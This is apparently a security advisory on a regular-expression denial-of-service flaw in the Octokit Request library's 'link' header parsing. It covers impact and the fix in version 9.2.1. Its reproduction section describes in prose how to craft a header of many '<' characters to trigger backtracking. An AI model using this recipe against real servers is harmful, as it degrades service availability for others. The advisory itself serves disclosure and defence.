Octokit Request Regular Expression Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in the Octokit Request library, specifically in versions 1.0.0 and prior to 9.2.1. The issue arises from a regular expression used to match the 'link' header in HTTP responses, which is vulnerable to catastrophic backtracking. This flaw can be exploited by sending a malicious 'link' header, leading to excessive CPU usage and causing the server to become unresponsive, thereby impacting service availability.

Impact

Exploitation of this vulnerability causes high CPU usage, leading to server unresponsiveness or crashes under load, thereby degrading service availability.

Reproduction

The vulnerability can be reproduced by sending an HTTP request with a 'link' header that includes a large number of consecutive '<' characters, followed by a closing '>'. This crafted header triggers the regular expression to perform excessive backtracking, causing high CPU usage and potentially making the server unresponsive. The Octokit Request library can be used to automate this process by replacing the global fetch function with one that includes the malicious 'link' header.

Remediation

Users can upgrade to Octokit Request version 9.2.1 or later to address this vulnerability.